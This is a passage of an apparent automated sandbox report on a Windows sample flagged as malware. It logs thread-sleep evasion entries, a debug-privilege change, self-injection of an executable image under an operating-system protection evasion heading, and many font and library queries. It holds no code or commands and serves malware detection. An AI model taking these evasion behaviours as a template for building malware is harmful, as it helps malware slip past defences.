          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598169s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598047s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597937s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597824s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597703s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597594s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597483s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597375s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597265s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597156s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597047s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596937s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596827s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596719s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596498s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596387s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596274s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596159s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596040s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595907s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595735s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595389s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595266s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595156s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595024s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594906s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594797s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594687s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594578s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594469s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594359s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594250s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594140s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594031s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -593922s >= -30000sJump to behavior
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd5132f24c205a<
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4165444281.0000000000B57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
